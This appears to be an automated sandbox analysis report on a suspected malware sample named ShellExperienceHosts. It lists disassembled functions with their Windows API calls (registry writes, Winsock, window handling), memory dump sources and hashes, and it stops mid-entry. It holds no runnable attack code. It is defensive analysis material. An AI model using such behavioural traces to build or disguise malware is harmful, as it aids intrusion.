                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                            • API String ID: 2061474489-1962646049
                                                                            • Opcode ID: bc0d6931ce49a58c0a0a9d126d08986d2c3126f42be07b3b55e379aa0c8e16f1
                                                                            • Instruction ID: 6949dffa8b35ffbb116d1313fbb5cca4022f8d2e22f1a0c6835be016ada563f5
                                                                            • Opcode Fuzzy Hash: bc0d6931ce49a58c0a0a9d126d08986d2c3126f42be07b3b55e379aa0c8e16f1
                                                                            • Instruction Fuzzy Hash: D3F0A031705226AB8F216BA59A0C80A3B789B5A79A3000632FD09D3600DB24DC42DBE1
                                                                            Function 100133F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 10013412
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 10013423
                                                                            • __getptd.LIBCMT ref: 10013431
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: MOC$RCC$csm
                                                                            • API String ID: 803148776-2671469338
                                                                            • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                            • Instruction ID: 786e14bf1501c0e18a8257e8a75f03574bdb54e2dd84c562cebc2d2ff3df38bd
                                                                            • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                            • Instruction Fuzzy Hash: 86E01A345042488FE720DB68C04AB5933E4FBC8294F5680A5F41ECF226C738FD908942
                                                                            Function 022359E9 Relevance: 9.2, APIs: 6, Instructions: 232timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 02235A3C
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C36
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C57
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235ADB
                                                                              • Part of subcall function 02231257: __CxxThrowException@8.LIBCMT ref: 02231267
                                                                              • Part of subcall function 02231257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02231278
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02235CC8
                                                                            • timeGetTime.WINMM ref: 02235CCE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                            • String ID:
                                                                            • API String ID: 2093779962-0
                                                                            • Opcode ID: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                            • Instruction ID: a187c8770af6b606f5260c0a57d4873b842289f31e1eae5a85cc72c28022da09
                                                                            • Opcode Fuzzy Hash: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                            • Instruction Fuzzy Hash: 46A1E5F0A01A56AFE315DFAAC8C4796FBA8FB09304F90462ED12DC7640D775A964CF90
                                                                            Function 022359F7 Relevance: 9.2, APIs: 6, Instructions: 227timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 02235A3C
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C36
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C57
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235ADB
                                                                              • Part of subcall function 02231257: __CxxThrowException@8.LIBCMT ref: 02231267
                                                                              • Part of subcall function 02231257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02231278
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02235CC8
                                                                            • timeGetTime.WINMM ref: 02235CCE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                            • String ID:
                                                                            • API String ID: 2093779962-0
                                                                            • Opcode ID: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                            • Instruction ID: 0b13e4d64ae44488c3284078f62340215b3d2ca4f6a4880de68180ad48585687
                                                                            • Opcode Fuzzy Hash: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                            • Instruction Fuzzy Hash: CBA1E5F0A01A56AFE315DF6AC8C4796FBA8FB09304F90862ED12DC7640D775A964CF90
                                                                            Function 6C71C4F9 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 6C71C69C
                                                                            • GetParent.USER32(?), ref: 6C71C6BB
                                                                            • GetParent.USER32(?), ref: 6C71C6CA
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505,6C893370,00000000), ref: 6C71C730
                                                                            • GetParent.USER32(?), ref: 6C71C739
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000), ref: 6C71C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$RedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 2946272266-0
                                                                            • Opcode ID: ec8e0b42d952b7a5e77f90ae2c7252b7f1249173a0f2f81bfe66d44b64574f1c
                                                                            • Instruction ID: 537d54c2596a7b12432083bd9c470136dedaf4899eeb1c8048671a3ec3f9a823
                                                                            • Opcode Fuzzy Hash: ec8e0b42d952b7a5e77f90ae2c7252b7f1249173a0f2f81bfe66d44b64574f1c
                                                                            • Instruction Fuzzy Hash: CF719F71700215AFDF059F60C998A6D7BBABF89359B2801B9E916E7750DB30AD01CFD0
                                                                            Function 6C80EC56 Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C80EC5D
                                                                            • GetDC.USER32(?), ref: 6C80ED9E
                                                                              • Part of subcall function 6C7654EE: __EH_prolog3.LIBCMT ref: 6C7654F5
                                                                            • ReleaseDC.USER32(?,00000000), ref: 6C80EE08
                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 6C80EE2F
                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 6C80EE43
                                                                            • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,6C8AA808,6C8AA808), ref: 6C80EEFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$H_prolog3H_prolog3_ReleaseScrollShow
                                                                            • String ID:
                                                                            • API String ID: 3992271784-0
                                                                            • Opcode ID: e73c0c821bfe723570db08234ed4a0f07773fb37c43dbbcfb41248eae03489b2
                                                                            • Instruction ID: 85c3936f6aeda2d527ebffbcadf0364eb92d7f2070ad26fe38c8783ab8863079
                                                                            • Opcode Fuzzy Hash: e73c0c821bfe723570db08234ed4a0f07773fb37c43dbbcfb41248eae03489b2
                                                                            • Instruction Fuzzy Hash: 81911674B01215DFDB148F68C988BAA7BB1FF49314F1541B9EC09AB3A5CB31AC01CBA4
                                                                            Function 6C7DC957 Relevance: 9.2, APIs: 6, Instructions: 195windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7DC95E
                                                                            • CoTaskMemFree.OLE32(?,000000FF), ref: 6C7DCA97
                                                                            • GetParent.USER32(?), ref: 6C7DCAFD
                                                                            • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 6C7DCB26
                                                                            • GetParent.USER32(?), ref: 6C7DCB4C
                                                                            • SendMessageW.USER32(?,00000465,00000104,00000000), ref: 6C7DCB72
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageParentSend$FreeH_prolog3Task
                                                                            • String ID:
                                                                            • API String ID: 526180827-0
                                                                            • Opcode ID: 1de1756acca9e50f22d5284614ada96741c11c9d973b8810dfc27a8042b35b89
                                                                            • Instruction ID: 24ecc5d8996fb1eafd6f2079e855dccaee3d5c6c58915a1b32fd11ffd8806493
                                                                            • Opcode Fuzzy Hash: 1de1756acca9e50f22d5284614ada96741c11c9d973b8810dfc27a8042b35b89
                                                                            • Instruction Fuzzy Hash: 0B619371A0021AAFCF04EFA4CD84DBEB774BF49719F150269E526B7690DB30AD05CB98
                                                                            Function 6C82E937 Relevance: 9.2, APIs: 6, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C82E97E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C82E9E9
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C82EA06
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,6C6C3845,C8B8FD39,00000000,00000000,00000000), ref: 6C82EA45
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C82EAA4
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,6C6C3845,C8B8FD39,00000000,00000000), ref: 6C82EAC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide
                                                                            • String ID:
                                                                            • API String ID: 2829165498-0
                                                                            • Opcode ID: 5d1122c2ff61345d72fb476649ffc4206ae48a719a9771d3383e4e75f6b75526
                                                                            • Instruction ID: 53b9c99be062990c6251c985a649598e39f4be4734e8809d3b619b5e25ce9cc2
                                                                            • Opcode Fuzzy Hash: 5d1122c2ff61345d72fb476649ffc4206ae48a719a9771d3383e4e75f6b75526
                                                                            • Instruction Fuzzy Hash: 9B51A472601216ABEF208E74CD4CFAB3AB9FF56759F204835F911A6580D778D840CBE4
                                                                            Function 6C72A86D Relevance: 9.1, APIs: 6, Instructions: 135windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsMenu.USER32(?), ref: 6C72A8BA
                                                                            • GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 6C72A8E5
                                                                            • GetMenuItemCount.USER32(?), ref: 6C72A8F1
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 6C72A924
                                                                            • GetSubMenu.USER32(?,00000000), ref: 6C72A973
                                                                            • GetMenuState.USER32(?,00000000,00000400), ref: 6C72A9BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountDefaultState
                                                                            • String ID:
                                                                            • API String ID: 170603052-0
                                                                            • Opcode ID: a0e3f77f899b00aeeca28d912aefe5f4a50ccd66a87773c9ee1afdf5f0c5bf1c
                                                                            • Instruction ID: d81e05a429449508d1977a67a2aa66e5b92cd5c3a497d2a614d6a24c4f789960
                                                                            • Opcode Fuzzy Hash: a0e3f77f899b00aeeca28d912aefe5f4a50ccd66a87773c9ee1afdf5f0c5bf1c
                                                                            • Instruction Fuzzy Hash: C451BF70A00606AFDF05DFA5CA48BADBBB5FF48358F204139E555A7B90DB38AD11DB80
                                                                            Function 02235287 Relevance: 9.1, APIs: 6, Instructions: 123registrysleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 02235359
                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 02235369
                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 02235387
                                                                            • RegCloseKey.ADVAPI32(?), ref: 02235392
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 022353F2
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0223540B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                            • String ID:
                                                                            • API String ID: 4289506047-0
                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction ID: dca10d77eb1c594a007f1a75600057654d77d0e2382785ff3ea5e7396b7ca43a
                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction Fuzzy Hash: C041F0B16283419BE3169BB08C44F7A7BB2AB4D304FD84459E5899E186E3F0D552CBA1
                                                                            Function 6C75E491 Relevance: 9.1, APIs: 6, Instructions: 116networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C75E49B
                                                                              • Part of subcall function 6C7A17CE: __EH_prolog3_catch.LIBCMT ref: 6C7A17D5
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 6C75E4E0
                                                                            • WSACleanup.WS2_32 ref: 6C75E52F
                                                                            • WSASetLastError.WS2_32(0000276C), ref: 6C75E53A
                                                                            • WSACleanup.WS2_32 ref: 6C75E5DA
                                                                            • FreeLibrary.KERNEL32(?,6C75E5F5,?,6C75E5F5,00000198,6C6DC118,00000000), ref: 6C75E5E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Cleanup$ErrorFreeH_prolog3_H_prolog3_catchLastLibraryStartup
                                                                            • String ID:
                                                                            • API String ID: 2958719020-0
                                                                            • Opcode ID: d00f447725833ab132a91fcfa1505ba75d042858754620cc370ad6413792e411
                                                                            • Instruction ID: 1e48d2f22258193b823a7b59b23e6b4ab6f86bce84b0b5b676a383f3f6966009
                                                                            • Opcode Fuzzy Hash: d00f447725833ab132a91fcfa1505ba75d042858754620cc370ad6413792e411
                                                                            • Instruction Fuzzy Hash: E941F370B0231ADFEB209F748B0C78976B0AF01718F904579E055CAE84EF78D961CB91
                                                                            Function 6C7DC801 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 6C7DC83C
                                                                              • Part of subcall function 6C73D911: UnhookWindowsHookEx.USER32(?), ref: 6C73D93B
                                                                            • IsWindowEnabled.USER32(00000000), ref: 6C7DC872
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 6C7DC88A
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 6C7DC92B
                                                                            • IsWindow.USER32(00000000), ref: 6C7DC932
                                                                            • SetFocus.USER32(00000000), ref: 6C7DC93D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableFocus$EnabledHookUnhookWindows
                                                                            • String ID:
                                                                            • API String ID: 2931672367-0
                                                                            • Opcode ID: c0e4dfcb8ce6751bbd46ebe8c9e27b785afc769de74cc60e4ea9b49b2a05ecc0
                                                                            • Instruction ID: adf618ced343e7cd2ee375ea678be331cac85d388932bd9353547afd6941667a
                                                                            • Opcode Fuzzy Hash: c0e4dfcb8ce6751bbd46ebe8c9e27b785afc769de74cc60e4ea9b49b2a05ecc0
                                                                            • Instruction Fuzzy Hash: C0418C30700601EFDB04AF64CA88B99BBB5FF4630AF118179E41A9B691CB70B859CB95
                                                                            Function 02235037 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02235081
                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,100191B0,?,?,10014228,000000FF), ref: 02235099
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 022350A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction ID: 6e245ac6c6153ff47d3a53368cc0315c32813894426738395c1a66cbd5fedbd8
                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction Fuzzy Hash: F5319DB2A04344EBD722CF94CC85B6AB3E9EB4C711F40861AF909C7680D737E810CB50
                                                                            Function 10005060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,29759B20,?,?,10014228,000000FF), ref: 100050AA
                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,29759B20,?,?,10014228,000000FF), ref: 100050C2
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 100050CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction ID: 94e9e828bd4e4f39969e9d0b2c4f8dfc3b4d38cc2041e0ad1404f002baf5890c
                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction Fuzzy Hash: DE316D76A04644EBE711CF95DD86BABB3E8FB48752F008A1AF906C7645D776E800CB90
                                                                            Function 6C6FAF33 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6FAF3A
                                                                              • Part of subcall function 6C75814E: __EH_prolog3.LIBCMT ref: 6C758155
                                                                              • Part of subcall function 6C75814E: SetRectEmpty.USER32 ref: 6C75823F
                                                                              • Part of subcall function 6C75814E: SetRectEmpty.USER32(?), ref: 6C75826A
                                                                              • Part of subcall function 6C722BD7: __EH_prolog3.LIBCMT ref: 6C722BDE
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0A5
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0B4
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0BB
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0C2
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0EC
                                                                            Memory Dump Source
